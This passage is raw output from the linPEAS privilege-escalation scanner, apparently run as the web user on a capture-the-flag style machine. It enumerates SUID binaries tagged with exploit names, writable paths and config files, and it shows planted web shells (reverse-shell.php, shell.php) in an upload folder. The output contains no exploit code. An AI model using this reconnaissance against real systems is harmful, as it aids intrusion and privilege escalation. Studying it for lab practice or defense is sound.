/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
/etc/ssl/certs/CFCA_EV_ROOT.pem
/etc/ssl/certs/COMODO_Certification_Authority.pem
/etc/ssl/certs/COMODO_ECC_Certification_Authority.pem
2255PSTORAGE_CERTSBIN
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 May 29 2021 /etc/pam.d
-rw-r--r-- 1 root root 2133 Jan 31 2020 /etc/pam.d/sshd
account required pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
session required pam_loginuid.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so motd=/run/motd.dynamic
session optional pam_motd.so noupdate
session optional pam_mail.so standard noenv # [1]
session required pam_limits.so
session required pam_env.so # [1]
session required pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 May 29 2021 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x 3 root root 4096 Oct 15 2020 /usr/share/phpmyadmin/vendor/google/recaptcha/.github
drwxr-xr-x 2 root root 4096 Oct 15 2020 /usr/share/phpmyadmin/vendor/phpmyadmin/motranslator/.github
drwxr-xr-x 2 root root 4096 Oct 15 2020 /usr/share/phpmyadmin/vendor/tecnickcom/tcpdf/.github
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 8700 Mar 16 2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 16 2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Mar 16 2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 7443 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 8700 Mar 16 2021 /usr/share/keyrings/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 16 2021 /usr/share/keyrings/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Mar 16 2021 /usr/share/keyrings/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Mar 16 2021 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Mar 16 2021 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Mar 16 2021 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 55625 Mar 16 2021 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 36873 Mar 16 2021 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 7443 Mar 16 2021 /usr/share/keyrings/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Mar 16 2021 /usr/share/keyrings/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Mar 16 2021 /usr/share/keyrings/debian-archive-stretch-stable.gpg
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Mar 1 2019 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5851 May 29 2021 /etc/vsftpd.conf
anonymous_enable=YES
local_enable=YES
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
-rw-r--r-- 1 root root 41 Jun 18 2015 /usr/lib/tmpfiles.d/vsftpd.conf
-rw-r--r-- 1 root root 506 Mar 6 2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 564 Mar 6 2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 260 Feb 1 2008 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf
anonymous_enable
local_enable=YES
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 69 Feb 13 2021 /etc/php/7.3/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Feb 13 2021 /usr/share/php7.3-common/common/ftp.ini
╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 856 Mar 1 2019 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 856 Mar 1 2019 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 22 May 29 2021 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 May 29 2021 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 May 29 2021 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3526 Apr 18 2019 /etc/skel/.bashrc
-rw-r--r-- 1 grimmie administrator 3526 May 29 2021 /home/grimmie/.bashrc
-rw-r--r-- 1 root root 807 Apr 18 2019 /etc/skel/.profile
-rw-r--r-- 1 grimmie administrator 807 May 29 2021 /home/grimmie/.profile
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
- /usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
- /usr/local/lib/x86_64-linux-gnu
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu
/etc/ld.so.preload
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=
══╣ Parent process capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 Feb 10 2019 usr.bin.man
-rw-r--r-- 1 root root 730 Nov 25 2020 usr.sbin.mysqld
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 20
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 664 Mar 1 2019 bash_completion.sh
-rw-r--r-- 1 root root 1107 Sep 14 2018 gawk.csh
-rw-r--r-- 1 root root 757 Sep 14 2018 gawk.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www
/var/www/html
/var/www/html/index.html
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/tmp
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/lib/phpmyadmin
/var/lib/phpmyadmin/tmp
/var/lib/phpmyadmin/tmp/twig
/var/lib/phpmyadmin/tmp/twig/15
/var/lib/phpmyadmin/tmp/twig/15/15a885ca9738e5a84084a3e52f1f6b23c771ea4f7bdca01081f7b87d3b86a6f9.php
/var/lib/phpmyadmin/tmp/twig/21
/var/lib/phpmyadmin/tmp/twig/21/21a3bee2bc40466295b888b9fec6fb9d77882a7cf061fd3f3d7194b5d54ab837.php
/var/lib/phpmyadmin/tmp/twig/22
/var/lib/phpmyadmin/tmp/twig/22/22f328e86274b51eb9034592ac106d133734cc8f4fba3637fe76b0a4b958f16d.php
/var/lib/phpmyadmin/tmp/twig/28
/var/lib/phpmyadmin/tmp/twig/28/28bcfd31671cb4e1cff7084a80ef5574315cd27a4f33c530bc9ae8da8934caf6.php
/var/lib/phpmyadmin/tmp/twig/2e
/var/lib/phpmyadmin/tmp/twig/2e/2e6ed961bffa8943f6419f806fe7bfc2232df52e39c5880878e7f34aae869dd9.php
/var/lib/phpmyadmin/tmp/twig/31
/var/lib/phpmyadmin/tmp/twig/31/317c8816ee34910f2c19f0c2bd6f261441aea2562acc0463975f80a4f0ed98a9.php
/var/lib/phpmyadmin/tmp/twig/36
/var/lib/phpmyadmin/tmp/twig/36/360a7a01227c90acf0a097d75488841f91dc2939cebca8ee28845b8abccb62ee.php
/var/lib/phpmyadmin/tmp/twig/3b
/var/lib/phpmyadmin/tmp/twig/3b/3bf8a6b93e8c4961d320a65db6c6f551428da6ae8b8e0c87200629b4ddad332d.php
/var/lib/phpmyadmin/tmp/twig/41
/var/lib/phpmyadmin/tmp/twig/41/4161342482a4d1436d31f5619bbdbd176c50e500207e3f364662f5ba8210fe31.php
/var/lib/phpmyadmin/tmp/twig/42
/var/lib/phpmyadmin/tmp/twig/42/426cadcf834dab31a9c871f8a7c8eafa83f4c66a2297cfefa7aae7a7895fa955.php
/var/lib/phpmyadmin/tmp/twig/43
/var/lib/phpmyadmin/tmp/twig/43/43cb8c5a42f17f780372a6d8b976cafccd1f95b8656d9d9638fca2bb2c0c1ee6.php
/var/lib/phpmyadmin/tmp/twig/4c
/var/lib/phpmyadmin/tmp/twig/4c/4c13e8023eae0535704510f289140d5447e25e2dea14eaef5988afa2ae915cb9.php
/var/lib/phpmyadmin/tmp/twig/4e
/var/lib/phpmyadmin/tmp/twig/4e/4e68050e4aec7ca6cfa1665dd465a55a5d643fca6abb104a310e5145d7310851.php
/var/lib/phpmyadmin/tmp/twig/4e/4e8f70ab052f0a5513536d20f156e0649e1791c083804a629624d2cb1e052f1f.php
/var/lib/phpmyadmin/tmp/twig/4f
/var/lib/phpmyadmin/tmp/twig/4f/4f7c1ace051b6b8cb85528aa8aef0052b72277f654cb4f13f2fc063f8529efe4.php
/var/lib/phpmyadmin/tmp/twig/53
/var/lib/phpmyadmin/tmp/twig/53/53ec6cf1deb6f8f805eb3077b06e6ef3b7805e25082d74c09563f91a11c1dfcd.php
/var/lib/phpmyadmin/tmp/twig/5c
/var/lib/phpmyadmin/tmp/twig/5c/5cf13d5a4ba7434d92bc44defee51a93cfbafa0d7984fcb8cbea606d97fe3e1a.php
/var/lib/phpmyadmin/tmp/twig/61
/var/lib/phpmyadmin/tmp/twig/61/61cf92e037fb131bad1ea24485b8e2ab7f0dd05dbe0bcdec85d8a96c80458223.php
/var/lib/phpmyadmin/tmp/twig/6b
/var/lib/phpmyadmin/tmp/twig/6b/6b8deef855b316d17c87795aebdf5aa33b55fae3e6c453d2a5bab7c4085f85d7.php
/var/lib/phpmyadmin/tmp/twig/6c
/var/lib/phpmyadmin/tmp/twig/6c/6c9a7cd11578d393beebc51daa9a48d35c8b03d3a69fd786c55ceedf71a62d29.php
/var/lib/phpmyadmin/tmp/twig/73
/var/lib/phpmyadmin/tmp/twig/73/73a22388ea06dda0a2e91e156573fc4c47961ae6e35817742bb6901eb91d5478.php
/var/lib/phpmyadmin/tmp/twig/73/73ee99e209023ff62597f3f6e5f027a498c1261e4d35d310b0d0a2664f3c2c0d.php
/var/lib/phpmyadmin/tmp/twig/78
/var/lib/phpmyadmin/tmp/twig/78/786fc5d49e751f699117fbb46b2e5920f5cdae9b5b3e7bb04e39d201b9048164.php
/var/lib/phpmyadmin/tmp/twig/7d
/var/lib/phpmyadmin/tmp/twig/7d/7d8087d41c482579730682151ac3393f13b0506f63d25d3b07db85fcba5cdbeb.php
/var/lib/phpmyadmin/tmp/twig/7f
/var/lib/phpmyadmin/tmp/twig/7f/7f2fea86c14cdbd8cd63e93670d9fef0c3d91595972a398d9aa8d5d919c9aa63.php
/var/lib/phpmyadmin/tmp/twig/8a
/var/lib/phpmyadmin/tmp/twig/8a/8a16ca4dbbd4143d994e5b20d8e1e088f482b5a41bf77d34526b36523fc966d7.php
/var/lib/phpmyadmin/tmp/twig/8b
/var/lib/phpmyadmin/tmp/twig/8b/8b3d6e41c7dc114088cc4febcf99864574a28c46ce39fd02d9577bec9ce900de.php
/var/lib/phpmyadmin/tmp/twig/96
/var/lib/phpmyadmin/tmp/twig/96/96885525f00ce10c76c38335c2cf2e232a709122ae75937b4f2eafcdde7be991.php
/var/lib/phpmyadmin/tmp/twig/97
/var/lib/phpmyadmin/tmp/twig/97/9734627c3841f4edcd6c2b6f193947fc0a7a9a69dd1955f703f4f691af6b45e3.php
/var/lib/phpmyadmin/tmp/twig/99
/var/lib/phpmyadmin/tmp/twig/99/9937763182924ca59c5731a9e6a0d96c77ec0ca5ce3241eec146f7bca0a6a0dc.php
/var/lib/phpmyadmin/tmp/twig/9d
/var/lib/phpmyadmin/tmp/twig/9d/9d254bc0e43f46a8844b012d501626d3acdd42c4a2d2da29c2a5f973f04a04e8.php
/var/lib/phpmyadmin/tmp/twig/9d/9d6c5c59ee895a239eeb5956af299ac0e5eb1a69f8db50be742ff0c61b618944.php
/var/lib/phpmyadmin/tmp/twig/9e
/var/lib/phpmyadmin/tmp/twig/9e/9ed23d78fa40b109fca7524500b40ca83ceec9a3ab64d7c38d780c2acf911588.php
/var/lib/phpmyadmin/tmp/twig/a0
/var/lib/phpmyadmin/tmp/twig/a0/a0c00a54b1bb321f799a5f4507a676b317067ae03b1d45bd13363a544ec066b7.php
/var/lib/phpmyadmin/tmp/twig/a4
/var/lib/phpmyadmin/tmp/twig/a4/a49a944225d69636e60c581e17aaceefffebe40aeb5931afd4aaa3da6a0039b9.php
/var/lib/phpmyadmin/tmp/twig/a7
/var/lib/phpmyadmin/tmp/twig/a7/a7e9ef3e1f57ef5a497ace07803123d1b50decbe0fcb448cc66573db89b48e25.php
/var/lib/phpmyadmin/tmp/twig/ae
/var/lib/phpmyadmin/tmp/twig/ae/ae25b735c0398c0c6a34895cf07f858207e235cf453cadf07a003940bfb9cd05.php
/var/lib/phpmyadmin/tmp/twig/af
/var/lib/phpmyadmin/tmp/twig/af/af668e5234a26d3e85e170b10e3d989c2c0c0679b2e5110d593a80b4f58c6443.php
/var/lib/phpmyadmin/tmp/twig/af/af6dd1f6871b54f086eb95e1abc703a0e92824251df6a715be3d3628d2bd3143.php
/var/lib/phpmyadmin/tmp/twig/af/afa81ff97d2424c5a13db6e43971cb716645566bd8d5c987da242dddf3f79817.php
/var/lib/phpmyadmin/tmp/twig/b6
/var/lib/phpmyadmin/tmp/twig/b6/b6c8adb0e14792534ce716cd3bf1d57bc78d45138e62be7d661d75a5f03edcba.php
/var/lib/phpmyadmin/tmp/twig/c3
/var/lib/phpmyadmin/tmp/twig/c3/c34484a1ece80a38a03398208a02a6c9c564d1fe62351a7d7832d163038d96f4.php
/var/lib/phpmyadmin/tmp/twig/c5
/var/lib/phpmyadmin/tmp/twig/c5/c50d1c67b497a887bc492962a09da599ee6c7283a90f7ea08084a548528db689.php
/var/lib/phpmyadmin/tmp/twig/c7
/var/lib/phpmyadmin/tmp/twig/c7/c70df99bff2eea2f20aba19bbb7b8d5de327cecaedb5dc3d383203f7d3d02ad2.php
/var/lib/phpmyadmin/tmp/twig/ca
/var/lib/phpmyadmin/tmp/twig/ca/ca32544b55a5ebda555ff3c0c89508d6e8e139ef05d8387a14389443c8e0fb49.php
/var/lib/phpmyadmin/tmp/twig/d6
/var/lib/phpmyadmin/tmp/twig/d6/d66c84e71db338af3aae5892c3b61f8d85d8bb63e2040876d5bbb84af484fb41.php
/var/lib/phpmyadmin/tmp/twig/dd
/var/lib/phpmyadmin/tmp/twig/dd/dd1476242f68168118c7ae6fc7223306d6024d66a38b3461e11a72d128eee8c1.php
/var/lib/phpmyadmin/tmp/twig/e8
/var/lib/phpmyadmin/tmp/twig/e8/e8184cd61a18c248ecc7e06a3f33b057e814c3c99a4dd56b7a7da715e1bc2af8.php
/var/lib/phpmyadmin/tmp/twig/e9
/var/lib/phpmyadmin/tmp/twig/e9/e93db45b0ff61ef08308b9a87b60a613c0a93fab9ee661c8271381a01e2fa57a.php
/var/lib/phpmyadmin/tmp/twig/f5
/var/lib/phpmyadmin/tmp/twig/f5/f589c1ad0b7292d669068908a26101f0ae7b5db110ba174ebc5492c80bc08508.php
/var/lib/phpmyadmin/tmp/twig/fa
/var/lib/phpmyadmin/tmp/twig/fa/fa249f377795e48c7d92167e29cef2fc31f50401a0bdbc95ddb51c0aec698b9e.php
/var/tmp
/var/www/html/academy
/var/www/html/academy/admin
/var/www/html/academy/admin/assets
/var/www/html/academy/admin/assets/css
/var/www/html/academy/admin/assets/css/bootstrap.css
/var/www/html/academy/admin/assets/css/font-awesome.css
/var/www/html/academy/admin/assets/css/style.css
/var/www/html/academy/admin/assets/fonts
/var/www/html/academy/admin/assets/fonts/FontAwesome.otf
/var/www/html/academy/admin/assets/fonts/fontawesome-webfont.eot
/var/www/html/academy/admin/assets/fonts/fontawesome-webfont.ttf
/var/www/html/academy/admin/assets/fonts/fontawesome-webfont.woff
/var/www/html/academy/admin/assets/fonts/fontawesome-webfont.woff2
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/admin/assets/img
/var/www/html/academy/admin/assets/js
/var/www/html/academy/admin/assets/js/bootstrap.js
/var/www/html/academy/admin/assets/js/jquery-1.11.1.js
/var/www/html/academy/admin/change-password.php
/var/www/html/academy/admin/check_availability.php
/var/www/html/academy/admin/course.php
/var/www/html/academy/admin/department.php
/var/www/html/academy/admin/edit-course.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/admin/includes/config.php
/var/www/html/academy/admin/includes/footer.php
/var/www/html/academy/admin/includes/header.php
/var/www/html/academy/admin/includes/menubar.php
/var/www/html/academy/admin/index.php
/var/www/html/academy/admin/level.php
/var/www/html/academy/admin/logout.php
/var/www/html/academy/admin/manage-students.php
/var/www/html/academy/admin/print.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/assets
/var/www/html/academy/assets/css
/var/www/html/academy/assets/css/bootstrap.css
/var/www/html/academy/assets/css/font-awesome.css
/var/www/html/academy/assets/css/style.css
/var/www/html/academy/assets/fonts
/var/www/html/academy/assets/fonts/FontAwesome.otf
/var/www/html/academy/assets/fonts/fontawesome-webfont.eot
/var/www/html/academy/assets/fonts/fontawesome-webfont.ttf
/var/www/html/academy/assets/fonts/fontawesome-webfont.woff
/var/www/html/academy/assets/fonts/fontawesome-webfont.woff2
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/assets/img
/var/www/html/academy/assets/js
/var/www/html/academy/assets/js/bootstrap.js
/var/www/html/academy/assets/js/jquery-1.11.1.js
/var/www/html/academy/change-password.php
/var/www/html/academy/check_availability.php
/var/www/html/academy/db
/var/www/html/academy/db/onlinecourse.sql
/var/www/html/academy/enroll-history.php
/var/www/html/academy/enroll.php
/var/www/html/academy/includes
/var/www/html/academy/includes/config.php
/var/www/html/academy/includes/footer.php
/var/www/html/academy/includes/header.php
/var/www/html/academy/includes/menubar.php
/var/www/html/academy/index.php
/var/www/html/academy/logout.php
/var/www/html/academy/my-profile.php
/var/www/html/academy/pincode-verification.php
/var/www/html/academy/print.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/studentphoto/reverse-shell.php
/var/www/html/academy/studentphoto/script.php
/var/www/html/academy/studentphoto/shell.php
/var/www/html/academy/studentphoto/tmp
/var/www/html/academy/studentphoto/tmp/linpeas.sh
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
╔══════════╣ Executable files potentially added by user (limit 70)
╔══════════╣ Unexpected in /opt (usually empty)
total 11332
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 18 root root 4096 May 29 2021 ..
-rw-r--r-- 1 root root 1402271 Jun 3 2020 online-course-registration.zip
-rw-r--r-- 1 root root 10190261 Oct 15 2020 phpMyAdmin-4.9.7-all-languages.tar.gz
╔══════════╣ Unexpected in root
/vmlinuz
/initrd.img
/initrd.img.old
/vmlinuz.old
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/syslog
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/www-data (limit 20)
╔══════════╣ Files inside others home (limit 20)
/home/grimmie/.bash_history
/home/grimmie/.bashrc
/home/grimmie/backup.sh
/home/grimmie/.profile
/home/grimmie/.bash_logout
/var/www/html/index.html
/var/www/html/academy/logout.php
/var/www/html/academy/enroll.php
/var/www/html/academy/check_availability.php
/var/www/html/academy/my-profile.php
/var/www/html/academy/change-password.php
/var/www/html/academy/print.php
/var/www/html/academy/studentphoto/tmp/linpeas.sh
/var/www/html/academy/studentphoto/shell.php
/var/www/html/academy/studentphoto/reverse-shell.php
/var/www/html/academy/studentphoto/script.php
/var/www/html/academy/studentphoto/boys-profile-picture-screenshot.jpg
/var/www/html/academy/studentphoto/avatar-1.jpg.png
/var/www/html/academy/studentphoto/noimage.png
/var/www/html/academy/includes/footer.php
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rwxr-xr-- 1 grimmie administrator 112 May 30 2021 /home/grimmie/backup.sh
-rw-r--r-- 1 root root 9716 Nov 28 2020 /usr/lib/modules/4.19.0-13-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9731 Mar 19 2021 /usr/lib/modules/4.19.0-16-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 303 Oct 26 2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 363752 Apr 30 2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 348 Nov 25 2020 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rwxr-xr-x 1 root root 38412 Nov 25 2020 /usr/bin/wsrep_sst_mariabackup
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K May 29 2021 .
drwxr-xr-x 12 root root 4.0K May 29 2021 ..
drwxr-xr-x 3 root root 4.0K May 29 2021 html
/var/www/html:
total 24K
